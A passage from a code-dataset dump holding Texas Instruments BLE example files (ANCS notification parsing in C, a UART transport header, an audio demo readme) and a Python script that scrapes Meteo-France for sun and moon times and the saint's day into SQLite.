{\n case NOTI_ATTR_FIRST_PKT:\n {\n // Initialize the data buffer write index to zero, as this is\n // the first packet.\n currentDataBufWriteIndex = 0;\n\n // Ensure Command ID is equal to zero as stated in the spec.\n if (*packetData != COMMAND_ID_GET_NOTIFICATION_ATTRIBUTES)\n {\n if(*packetData == COMMAND_ID_GET_APP_ATTRIBUTES)\n {\n Ancs_processAppAttr(pMsg);\n }\n return;\n }\n packetData++;\n\n // Copy the ANCS notification UID so it may be used\n // to perform a positive or negative action if desired.\n VOID memcpy(currentNotifUID, packetData, ANCS_NOTIF_UID_LENGTH);\n\n packetData += ANCS_NOTIF_UID_LENGTH;\n\n // Store the ANCS attribute ID of the retrieved attribute.\n AttrID = *packetData;\n packetData++;\n\n // Store the 2-byte length of the data that is being retrieved.\n dataLen = BUILD_UINT16(*packetData, *(packetData + 1));\n\n // Check if the length is zero, if so the notification does not\n // have the specified attribute as stated in the ANCS spec.\n if ( dataLen == 0 )\n {\n if (AttrID == NOTIFICATION_ATTRIBUTE_ID_APP_IDENTIFIER)\n Display_print0(dispHandle, 7, 0, \"* AppID:\\tNot available\");\n else if (AttrID == NOTIFICATION_ATTRIBUTE_ID_TITLE)\n Display_print0(dispHandle, 8, 0, \"* Title:\\tNot available\");\n else if (AttrID == NOTIFICATION_ATTRIBUTE_ID_MESSAGE)\n {\n Display_print0(dispHandle, 9, 0, \"* Message:\\tNot available\");\n }\n pNotifQueueFront->notifData.currentState++;\n\n Ancs_processNotifications();\n\n return;\n }\n // Move the pointer to the data portion.\n packetData += 2;\n\n // Clear the data buffer in preparation for the new data.\n VOID memset(dataBuf, '\\0', DATA_BUFFER_SIZE);\n\n // If the data length specified in the first ANCS Data Service notification\n // is greater than the number of bytes that was sent in the\n // first data packet(total GATT msg length - request metadata), the data will be split into multiple packets.\n if (dataLen > pMsg->msg.handleValueNoti.len - NOTIF_ATTR_REQUEST_METADATA_LENGTH)\n {\n // Copy the number of bytes that were sent in the\n // first packet to the data buffer, then set the\n // data buffer write index, and set the state from first packet\n // to continued packet.\n VOID memcpy(dataBuf, packetData, (pMsg->msg.handleValueNoti.len - NOTIF_ATTR_REQUEST_METADATA_LENGTH));\n currentDataBufWriteIndex = (pMsg->msg.handleValueNoti.len - NOTIF_ATTR_REQUEST_METADATA_LENGTH);\n notifAttrPktProcessState = NOTI_ATTR_CONTINUE_PKT;\n\n // Subtract the number of data bytes contained in the first packet\n // from the total number of expected data bytes.\n dataLen -= (pMsg->msg.handleValueNoti.len - NOTIF_ATTR_REQUEST_METADATA_LENGTH);\n return;\n }\n else\n {\n // In this case all the ANCS attribute data was contained in\n // the first packet so the data is copied, and both the index and\n // length are reset.\n VOID memcpy(dataBuf, packetData, dataLen);\n currentDataBufWriteIndex = 0;\n dataLen = 0x0000;\n }\n }\n break;\n\n // Check if this is a continued data packet.\n case NOTI_ATTR_CONTINUE_PKT:\n {\n if (dataLen > 0)\n {\n // Copy all the data from the notification packet to the data buffer\n // starting from the current data buffer write index.\n VOID memcpy(dataBuf + currentDataBufWriteIndex, pMsg->msg.handleValueNoti.pValue,\n pMsg->msg.handleValueNoti.len);\n // Subtract the number of data bytes contained in the packet from\n // the total, and increase the data buffer write index by that amount.\n dataLen -= pMsg->msg.handleValueNoti.len;\n currentDataBufWriteIndex += pMsg->msg.handleValueNoti.len;\n\n // Checks if this is the last continued packet.\n if (dataLen == 0x0000)\n {\n // If so reset the write index and the state.\n currentDataBufWriteIndex = 0;\n notifAttrPktProcessState = NOTI_ATTR_FIRST_PKT;\n }\n }\n }\n break;\n\n default:\n break;\n }\n\n // The full attribute data has now been received; display it for the demo.\n // A real application would process the data here instead.\n if (dataLen == 0)\n {\n pNotifQueueFront->notifData.currentState++;\n\n if (AttrID == NOTIFICATION_ATTRIBUTE_ID_APP_IDENTIFIER)\n Display_print1(dispHandle, 7, 0, \"* AppID:\\t%s\", (char* )dataBuf);\n else if (AttrID == NOTIFICATION_ATTRIBUTE_ID_TITLE)\n Display_print1(dispHandle, 8, 0, \"* Title:\\t%s\", (char* )dataBuf);\n\n else if (AttrID == NOTIFICATION_ATTRIBUTE_ID_MESSAGE)\n Display_print1(dispHandle, 9, 0, \"* Message:\\t%s\", (char* )dataBuf);\n\n else if (AttrID == NOTIFICATION_ATTRIBUTE_ID_DATE)\n Ancs_printNotifDate(dataBuf);\n }\n // Check if the dataLen variable overflowed because packets were mismatched.\n // This may occur when rapidly connecting to and disconnecting from the device.\n else if(dataLen > DATA_BUFFER_SIZE - 1)\n {\n Display_print0(dispHandle, 7, 0, \"* AppID:\\tDATA CORRUPTED\");\n Display_print0(dispHandle, 7, 0, \"* App Name:\\tDATA CORRUPTED\");\n Display_print0(dispHandle, 8, 0, \"* Title:\\tDATA CORRUPTED\");\n Display_print0(dispHandle, 9, 0, \"* Message:\\tDATA CORRUPTED\");\n Display_print0(dispHandle, 10, 0, \"* Date:\\t\\tDATA CORRUPTED\");\n Ancs_findAndRemoveFromQueue(currentNotifUID);\n notifAttrPktProcessState = NOTI_ATTR_FIRST_PKT;\n }\n // Continue processing the current notification.\n Ancs_processNotifications();\n\n return;\n}\n\n/*********************************************************************\n * @fn Ancs_processNotifications\n *\n * @brief Process the front notification in the ANCS notification queue.\n *\n * @param none\n *\n * @return none\n */\nstatic void Ancs_processNotifications(void)\n{\n // Check if the notification queue is empty. If it is, return.\n if(!Ancs_queueEmpty())\n {\n // If not, check if the current notification is in its finished state.\n // If it is, remove it from the queue.\n if( pNotifQueueFront->notifData.currentState == NOTI_ATTR_ID_END )\n Ancs_popNotifFromQueue();\n\n // Process the notification currently at the front of the queue.\n Ancs_processNotificationServiceNotif(pNotifQueueFront);\n }\n\n return;\n}\n\n/*********************************************************************\n * @fn Ancs_processNotificationServiceNotif\n *\n * @brief Process ANCS Notification Service notifications\n *\n * @param pNotif - queued ANCS notification to process.\n *\n * @return none\n */\nstatic void Ancs_processNotificationServiceNotif(notifQueueNode_t *pNotif)\n{\n\n // If the notification is in its initial state, display its category.\n if ( pNotifQueueFront->notifData.currentState == NOTI_ATTR_ID_BEGIN )\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"New Notification\");\n#endif\n switch (pNotif->notifData.categoryID)\n {\n case CATEGORY_ID_OTHER:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tOther\");\n break;\n\n case CATEGORY_ID_INCOMING_CALL:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tIncomingCall\");\n haveIncomingCall = TRUE;\n memcpy(incomingCallUID, pNotif->notifData.notificationUID, ANCS_NOTIF_UID_LENGTH);\n break;\n\n case CATEGORY_ID_MISSED_CALL:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tMissedCall\");\n haveIncomingCall = FALSE;\n break;\n\n case CATEGORY_ID_VOICEMAIL:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tVoicemail\");\n break;\n\n case CATEGORY_ID_SOCIAL:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tSocial\");\n break;\n\n case CATEGORY_ID_SCHEDULE:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tSchedule\");\n break;\n\n case CATEGORY_ID_EMAIL:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tEmail\");\n break;\n\n case CATEGORY_ID_NEWS:\n Display_print0(dispHandle, 6, 0, \"* 
Category:\\tNews\");\n break;\n\n case CATEGORY_ID_HEALTH_AND_FITNESS:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tHealth And Fitness\");\n break;\n\n case CATEGORY_ID_BUSINESS_AND_FINANCE:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tBusiness And Finance\");\n break;\n\n case CATEGORY_ID_LOCATION:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tLocation\");\n break;\n\n case CATEGORY_ID_ENTERTAINMENT:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tEntertainment\");\n break;\n\n default:\n break;\n\n }\n }\n\n // Move to the attribute retrieval state machine.\n Ancs_handleNotifAttrRsp(pNotif->notifData.notificationUID);\n\n return;\n}\n\n/*********************************************************************\n * @fn Ancs_performNegativeAction\n *\n * @brief Performs a negative action on the notification with the passed UID\n *\n * @param notifUID - A pointer to a four byte array that contains a notification's UID\n *\n * @return status - Returns the status of the GATT write\n */\n\nstatic uint8_t Ancs_performNegativeAction(uint8_t* notifUID)\n{\n // This will store the return value.\n uint8_t status;\n\n // Declare the GATT write request.\n attWriteReq_t req;\n\n // Allocate the memory for the request.\n req.pValue = GATT_bm_alloc(Ancs_connHandle, ATT_WRITE_REQ, PERFORM_NOTIFICATION_ACTION_LENGTH, NULL);\n\n // If the allocation was not successful, set status to FAILURE.\n if (req.pValue == NULL)\n status = FAILURE;\n\n // If not, proceed with the GATT request.\n else\n {\n // Create a pointer to the request's data portion.\n uint8_t *requestPayload = req.pValue;\n\n // Set the handle to the Control Point's start handle stored in the handle cache.\n req.handle = Ancs_handleCache[ANCS_CTRL_POINT_HDL_START];\n\n // Set the write length of the GATT write.\n req.len = PERFORM_NOTIFICATION_ACTION_LENGTH;\n\n // Set the command ID to perform an action on the notification.\n *requestPayload = COMMAND_ID_PERFORM_NOTIFICATION_ACTION;\n requestPayload++;\n\n // Copy the ANCS notification UID to the request.\n VOID memcpy(requestPayload, notifUID, ANCS_NOTIF_UID_LENGTH);\n requestPayload += ANCS_NOTIF_UID_LENGTH;\n\n // Set the action type to negative.\n *requestPayload = ACTION_ID_NEGATIVE;\n\n // Signature and command must be set to zero.\n req.sig = 0;\n req.cmd = 0;\n\n status = GATT_WriteCharValue(Ancs_connHandle, &req, ICall_getEntityId());\n // If the GATT write is unsuccessful, free the allocated memory and set the status to FAILURE.\n if (status != SUCCESS)\n GATT_bm_free((gattMsg_t *) &req, ATT_WRITE_REQ);\n }\n\n return status;\n}\n\n/*********************************************************************\n * @fn Ancs_performPositiveAction\n *\n * @brief Performs a positive action on the notification with the passed UID\n *\n * @param notifUID - A pointer to a four byte array that contains a notification's UID\n *\n * @return status - Returns the status of the GATT write\n */\n\nstatic uint8_t Ancs_performPositiveAction(uint8_t *notifUID)\n{\n // This will store the return value.\n uint8_t status;\n\n // Declare the GATT write request.\n attWriteReq_t req;\n\n // Allocate the memory for the request.\n req.pValue = GATT_bm_alloc(Ancs_connHandle, ATT_WRITE_REQ, PERFORM_NOTIFICATION_ACTION_LENGTH, NULL);\n\n // If the allocation was not successful, set status to FAILURE.\n if (req.pValue == NULL)\n status = FAILURE;\n\n // If not, proceed with the GATT request.\n else\n {\n // Create a pointer to the request's data portion.\n uint8_t *requestPayload = req.pValue;\n\n // Set 
the handle to the Control Point's start handle stored in the handle cache.\n req.handle = Ancs_handleCache[ANCS_CTRL_POINT_HDL_START];\n\n // Set the write length of the GATT write.\n req.len = PERFORM_NOTIFICATION_ACTION_LENGTH;\n\n // Set the command ID to perform an action on the notification.\n *requestPayload = COMMAND_ID_PERFORM_NOTIFICATION_ACTION;\n requestPayload++;\n\n // Copy the ANCS notification UID to the request.\n VOID memcpy(requestPayload, notifUID, ANCS_NOTIF_UID_LENGTH);\n requestPayload += ANCS_NOTIF_UID_LENGTH;\n\n // Set the action type to positive.\n *requestPayload = ACTION_ID_POSITIVE;\n\n // Signature and command must be set to zero.\n req.sig = 0;\n req.cmd = 0;\n\n status = GATT_WriteCharValue(Ancs_connHandle, &req, ICall_getEntityId());\n // If the GATT write is unsuccessful, free the allocated memory and set the status to FAILURE.\n if (status != SUCCESS)\n GATT_bm_free((gattMsg_t *) &req, ATT_WRITE_REQ);\n }\n\n return status;\n}\n\n/*********************************************************************\n * @fn Ancs_printNotifDate\n *\n * @brief Processes the date data and prints it in a more user friendly format.\n *\n * @param dataBuf - Pointer to the Data buffer the data is stored in.\n *\n * @return none\n */\nstatic void Ancs_printNotifDate(uint8_t *dataBuf)\n{\n if(dataBuf[12] == '\\0')\n return;\n\n char year[5] = {'\\0'};\n char month[3] = {'\\0'};\n char day[3] = {'\\0'};\n char hour[3] = {'\\0'};\n char minute[3] = {'\\0'};\n char second[3] = {'\\0'};\n\n memcpy(year, dataBuf, 4);\n memcpy(month, dataBuf + 4, 2);\n memcpy(day, dataBuf + 6, 2);\n memcpy(hour, dataBuf + 9, 2);\n memcpy(minute, dataBuf + 11, 2);\n memcpy(second, dataBuf + 13, 2);\n\n uint8_t num;\n char time[14] = {'\\0'};\n time[2] = ':';\n memcpy(time + 3, minute, 2);\n time[5] = ':';\n memcpy(time + 6, second, 2);\n num = 10 * (hour[0] - '0') + (hour[1] - '0');\n\n if (num > 12)\n {\n num -= 12;\n memcpy(time + 8, \" PM\", 3);\n }\n else\n memcpy(time + 8, \" AM\", 3);\n\n if (num < 10)\n {\n time[0] = '0';\n time[1] = (char) (num + '0');\n }\n else\n {\n time[0] = '1';\n time[1] = (char) ((num % 10) + '0');\n }\n\n if(memcmp(month,\"01\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tJanuary %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"02\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tFebruary %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"03\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tMarch %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"04\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tApril %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"05\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tMay %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"06\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tJune %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"07\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tJuly %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"08\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tAugust %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"09\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tSeptember %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"10\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tOctober %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"11\", 2) == 0)\n 
Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tNovember %s, %s at %s\", day, year, time);\n\n else if(memcmp(month,\"12\", 2) == 0)\n Display_print3(dispHandle, 11, 0, \"* Date:\\t\\tDecember %s, %s at %s\", day, year, time);\n\n else\n Display_print4(dispHandle, 11, 0, \"* Date:\\t\\t%s/%s/%s at %s\", month, day, year, time);\n\n return;\n}\n\n/*********************************************************************\n * @fn Ancs_queueNewNotif\n *\n * @brief Extract data from the GATT notification and push it to the queue.\n *\n * @param pMsg - GATT message.\n *\n * @return none\n */\nvoid Ancs_queueNewNotif(gattMsgEvent_t *pMsg)\n{\n\n uint8_t len = pMsg->msg.handleValueNoti.len;\n if (len != 8)\n {\n Display_print0(dispHandle, 11, 0, \"\");\n Display_print0(dispHandle, 11, 0, \"Error evt len\");\n return;\n }\n\n // Create pointer to GATT notification data.\n uint8_t *packetData = pMsg->msg.handleValueNoti.pValue;\n\n // Store the ANCS notification's eventID\n uint8_t eventID = packetData[0];\n\n // Store the ANCS notification's eventFlag\n#ifdef IGNORE_PREEXISTING_NOTIFICATIONS\n uint8_t eventFlag = packetData[1];\n#endif\n\n // Store the ANCS notification's categoryID\n uint8_t categoryID = packetData[2];\n\n // Notification UID from packetData[4] to packetData[7]\n uint8_t* pNotificationUID = packetData + ANCS_NOTIF_UID_LENGTH;\n\n\n#ifdef IGNORE_PREEXISTING_NOTIFICATIONS\n if (eventFlag & EVENT_FLAG_PREEXISTING)\n return;\n#endif\n\n if (eventID == EVENT_ID_NOTIFICATION_ADDED)\n {\n // If it is not in the search list, add it.\n Ancs_pushNotifToQueue(categoryID, pNotificationUID);\n }\n else if (eventID == EVENT_ID_NOTIFICATION_REMOVED)\n {\n if(memcmp(pNotificationUID, currentNotifUID, 4))\n Ancs_findAndRemoveFromQueue(pNotificationUID);\n }\n\n // Move to the attribute retrieval process.\n Ancs_processNotifications();\n\n return;\n}\n\n/*********************************************************************\n * @fn Ancs_subsDataSrc\n *\n * @brief Subscribe Data Source\n *\n * @param none\n *\n * @return uint8_t SUCCESS/FAILURE\n */\nuint8_t Ancs_subsDataSrc(void)\n{\n // Empty notification list first\n Ancs_popAllNotifsFromQueue();\n\n // Call the function to write \"01\" to the Data Source CCCD.\n return Ancs_CCCDConfig(Ancs_handleCache[ANCS_DATA_SRC_HDL_CCCD], TRUE);\n}\n\n/*********************************************************************\n * @fn Ancs_subsNotifSrc\n *\n * @brief Subscribe Notification Source\n *\n * @param none\n *\n * @return uint8_t SUCCESS/FAILURE\n */\nuint8_t Ancs_subsNotifSrc(void)\n{\n // Empty notification list first\n Ancs_popAllNotifsFromQueue();\n\n // Call the function to write \"01\" to the Notification Source CCCD.\n return Ancs_CCCDConfig(Ancs_handleCache[ANCS_NOTIF_SCR_HDL_CCCD], TRUE);\n}\n\n/*********************************************************************\n *********************************************************************/\n"
},
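For reference, the six-byte Control Point payload assembled by `Ancs_performNegativeAction` / `Ancs_performPositiveAction` above (one command-ID byte, the four-byte notification UID, one action-ID byte) can be sketched host-side in Python. This is a minimal illustration, not code from the repo; the numeric constant values are assumptions taken from Apple's ANCS specification and should be verified against the project's headers.

```python
import struct

# Assumed values (per Apple's ANCS spec); verify against the project's headers.
COMMAND_ID_PERFORM_NOTIFICATION_ACTION = 2
ACTION_ID_POSITIVE = 0
ACTION_ID_NEGATIVE = 1
ANCS_NOTIF_UID_LENGTH = 4

def build_perform_action_payload(notif_uid, action_id):
    """Mirror the GATT write built in C: [command ID][4-byte UID][action ID]."""
    if len(notif_uid) != ANCS_NOTIF_UID_LENGTH:
        raise ValueError("notification UID must be exactly 4 bytes")
    return struct.pack("<B4sB", COMMAND_ID_PERFORM_NOTIFICATION_ACTION,
                       bytes(notif_uid), action_id)

# Example: dismiss (negative action) the notification with UID 7.
payload = build_perform_action_payload(b"\x07\x00\x00\x00", ACTION_ID_NEGATIVE)
assert len(payload) == 6  # matches PERFORM_NOTIFICATION_ACTION_LENGTH in the C code
```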
{
"alpha_fraction": 0.45726922154426575,
"alphanum_fraction": 0.46811243891716003,
"avg_line_length": 39.51445007324219,
"blob_id": "c0ed5ecba628f21f28f3d1190908dd8363b1e6a2",
"content_id": "cb33ae1f174dd835873cf1e103372bc47a520e6f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 7009,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 173,
"path": "/source/ti/blestack/sdi/src/inc/sdi_tl_uart.h",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/******************************************************************************\n\n @file sdi_tl_uart.h\n\n SDI Transport Layer Module for UART\n\n Group: CMCU, LPC, SCS\n Target Device: CC2640R2\n\n ******************************************************************************\n\n Copyright (c) 2015-2017, Texas Instruments Incorporated\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions\n are met:\n\n * Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n * Neither the name of Texas Instruments Incorporated nor the names of\n its contributors may be used to endorse or promote products derived\n from this software without specific prior written permission.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n ******************************************************************************\n Release Name: simplelink_cc2640r2_sdk_1_30_00_25\n Release Date: 2017-03-02 20:08:35\n *****************************************************************************/\n#ifndef SDI_TL_UART_H\n#define SDI_TL_UART_H\n\n#ifdef __cplusplus\nextern \"C\"\n{\n#endif\n\n// ****************************************************************************\n// includes\n// ****************************************************************************\n#include <ti/drivers/UART.h>\n// ****************************************************************************\n// defines\n// ****************************************************************************\n\n#define SDI_UART_FC_THRESHOLD 48\n#define SDI_UART_IDLE_TIMEOUT 6\n#define SDI_UART_INT_ENABLE TRUE\n\n#if !defined(SDI_UART_BR)\n#define SDI_UART_BR 115200 //921600\n#endif // !SDI_UART_BR\n\n// UART ISR Buffer define\n#define UART_ISR_BUF_SIZE 128\n#define UART_ISR_BUF_CNT 2\n\n// ****************************************************************************\n// typedefs\n// ****************************************************************************\n // -----------------------------------------------------------------------------\n//! \\brief Typedef for call back function mechanism to notify SDI TL that\n//! an SDI transaction has occured\n//! \\param[in] uint16 number of bytes received\n//! \\param[in] uint16 number of bytes transmitted\n//!\n//! 
\\return void\n// -----------------------------------------------------------------------------\ntypedef void (*sdiCB_t)(uint16 Rxlen, uint16 Txlen);\n\n// -----------------------------------------------------------------------------\n//! \\brief Typedef for call back function mechanism to reroute incoming SDI\n//! messages.\n//! NOTE: Definer MUST copy contents to local buffer. SDI task will\n//! free this memory.\n//! NOTE: The contained message buffer does NOT include any \"framing\"\n//! bytes, ie. SOF, FCS etc.\n//! \\param[in] pMsg Pointer to \"unframed\" message buffer.\n//!\n//! \\return void\n// -----------------------------------------------------------------------------\ntypedef void (*sdiTLIncomingEventCBack_t)(uint8_t event, uint8_t *pMsg, uint8_t len);\n\n//*****************************************************************************\n// globals\n//*****************************************************************************\nextern UART_Params paramsUART;\n//*****************************************************************************\n// function prototypes\n//*****************************************************************************\n\nuint8 SDITLUART_configureUARTParams(UART_Params *initParams);\n\n// -----------------------------------------------------------------------------\n//! \\brief This routine initializes the transport layer and opens the port\n//! of the device.\n//!\n//! \\param[in] tRxBuf - pointer to SDI TL Tx Buffer\n//! \\param[in] tTxBuf - pointer to SDI TL Rx Buffer\n//! \\param[in] sdiCBack - SDI TL call back function to be invoked at the end of\n//! a UART transaction\n//!\n//! \\return void\n// -----------------------------------------------------------------------------\nvoid SDITLUART_initializeTransport(char *tRxBuf, char *tTxBuf, sdiCB_t sdiCBack);\n\nvoid SDITLUART_closeUART(void);\n\n// -----------------------------------------------------------------------------\n//! \\brief Register callback function to reroute incoming (from UART)\n//! SDI messages.\n//!\n//! \\param[in] appRxCB Callback fucntion.\n//!\n//! \\return void\n// -----------------------------------------------------------------------------\nextern void SDITLUART_registerIncomingRXErrorStatusAppCB(sdiTLIncomingEventCBack_t appRxErrStatusCB);\n\n\n// -----------------------------------------------------------------------------\n//! \\brief This routine reads data from the UART\n//!\n//! \\return void\n// -----------------------------------------------------------------------------\nvoid SDITLUART_readTransport(void);\n\n// -----------------------------------------------------------------------------\n//! \\brief This routine writes copies buffer addr to the transport layer.\n//!\n//! \\param[in] len - Number of bytes to write.\n//!\n//! \\return uint16 - number of bytes written to transport\n// -----------------------------------------------------------------------------\nuint16 SDITLUART_writeTransport(uint16);\n\n// -----------------------------------------------------------------------------\n//! \\brief This routine stops any pending reads\n//!\n//! \\return void\n// -----------------------------------------------------------------------------\nvoid SDITLUART_stopTransfer(void);\n\n// -----------------------------------------------------------------------------\n//! \\brief This routine is called from the application context when MRDY is\n//! de-asserted\n//!\n//! 
\\return void\n// -----------------------------------------------------------------------------\nvoid SDITLUART_handleMrdyEvent(void);\n\n\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* SDI_TL_UART_H */\n"
},
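The two callback typedefs in `sdi_tl_uart.h` (`sdiCB_t` and `sdiTLIncomingEventCBack_t`) define the shape of the transport-layer hooks. Below is a hedged host-side sketch of the `sdiCB_t` signature using `ctypes`, purely to illustrate the calling convention; the real callback is registered from C firmware, not from Python.

```python
import ctypes

# sdiCB_t: void (*)(uint16 Rxlen, uint16 Txlen) -- fired after a UART transaction.
SdiCB = ctypes.CFUNCTYPE(None, ctypes.c_uint16, ctypes.c_uint16)

def on_uart_transaction(rx_len, tx_len):
    print("UART transaction complete: %d bytes in, %d bytes out" % (rx_len, tx_len))

cb = SdiCB(on_uart_transaction)
cb(48, 0)  # invoke the way the transport layer would after a read completes
```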
{
"alpha_fraction": 0.4482758641242981,
"alphanum_fraction": 0.4482758641242981,
"avg_line_length": 28,
"blob_id": "b160ce792fe9ad8f3b456a05ca3040afc47462c1",
"content_id": "68941a199ea84dee8bee4e55d8d6629128d0e920",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 29,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 1,
"path": "/tools/scripts/voice/codec/__init__.py",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "__all__ = [\"codec\", \"adpcm\"]\n"
},
{
"alpha_fraction": 0.7754911184310913,
"alphanum_fraction": 0.777362048625946,
"avg_line_length": 38.592594146728516,
"blob_id": "be78f5c512f6a9e26aca8df495d5f33793754349",
"content_id": "3091ccefbb13feee35b8e27a5d870c4b356bea50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1069,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 27,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/bleapps/simple_peripheral_bidirectional_audio/readme.md",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "Purpose / Scope\n===============\n\nThis page will document how to demonstrate an end to end full duplex BLE\nvoice/audio solution using two CC26xx devices.\nEmphasis will be placed on the central device which is responsible for\nestablishing the connection.\n\nVoice data is transferred over BLE using the TI audio\\_profile\\_dle which is a\nVoice Over GATT Profile (VoGP) design. This profile has been augmented to use\ndata length extension and large MTU.\n\nThis profile has been update to add an additional start byte. This new start\nbyte indicates that the following stream uses mSBC compression.\n\nIn this demo, data flows bidirectionally between a streamer (GATT server) and a\nreceiver (GATT client) device. This means both devices must act as both a GATT\nclient and a GATT server.\n\nThe `simple_peripheral_bidirectional_audio` project is a modified version of\n`simple_peripheral` from the BLE-SDK.\n\nPurpose / Scope\n===============\n\nThe theory and steps required to run the demo are described in the readme\ninside the `simple_central_bidirectional_audio` folder of this repo.\n"
}
] | 34 |
deneth/Ephemeris | https://github.com/deneth/Ephemeris | 73f0d022233a2c86f9a61b0ae22f6aee3497319c | f29f2e5b4407da94aa6320cef0f06e4741748eea | fcc5985dffe8e008ededfb44cd53330afa2d2afe | refs/heads/master | 2020-03-29T20:35:44.665481 | 2015-01-10T13:07:22 | 2015-01-10T13:07:22 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6361209750175476,
"alphanum_fraction": 0.642793595790863,
"avg_line_length": 33.06060791015625,
"blob_id": "c95453e83390be0bd5f047a7528b673fc6f2c487",
"content_id": "60c126a241fd55d7460a4d08eafb1b2644ea40b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2248,
"license_type": "no_license",
"max_line_length": 328,
"num_lines": 66,
"path": "/ephemeride-sqlite.py",
"repo_name": "deneth/Ephemeris",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: latin-1 -*-\n\nimport sqlite3\nimport re\nfrom time import sleep, localtime, strftime\nimport commands\nimport sys\n\npath = \"./\"\n\n# Download meteofrance index.html and save it in path+tmp\n# Delete previous file\ncommands.getstatusoutput('/bin/rm '+path+'tmp/index.html')\n# wget http://france.meteofrance.com/\ncommands.getstatusoutput('cd '+path+'tmp/ && curl http://www.meteofrance.com/accueil > index.html')\n\nFete = \"x\"\nSolLever = \"x\"\nSolCoucher = \"x\"\nLuneLever = \"x\"\nLuneCoucher = \"x\"\n\ntoday = strftime(\"%Y-%m-%d\", localtime())\n# Open file to read data\nwith open(path+'tmp/index.html', 'r') as f:\n page_source = f.read()\n\n m = re.search('<div class=\"mod-ephemeride-line mod-ephemeride-line-first\">.+<img src=\"/mf3-base-theme/images/contents/ephemeride-jour.png\" alt=\"Soleil\" />.+<span>Lever : <strong>(.+?)</strong></span>.+<span>Coucher : <strong>(.+?)</strong></span>.+</div>.+<div class=\"mod-ephemeride-line\">',page_source,re.DOTALL) \n if m:\n SolLever = m.group(1)\n SolCoucher = m.group(2)\n m = re.search('<div class=\"mod-ephemeride-line\">.+<img src=\"/mf3-base-theme/images/contents/ephemeride-nuit.png\" alt=\"Lune\" />.+<span>Lever : <strong>(.+?)</strong></span>.+<span>Coucher : <strong>(.+?)</strong></span>',page_source,re.MULTILINE|re.DOTALL) \n if m:\n LuneLever = m.group(1)\n LuneCoucher = m.group(2)\n m = re.search('<div class=\"mod-ephemeride\">.*<h2 class=\"capitalize\">.*</h2>.*<span class=\"mod-ephemeride-saint\">(.+?)</span><br>', page_source,re.MULTILINE|re.DOTALL)\n if m:\n Fete = 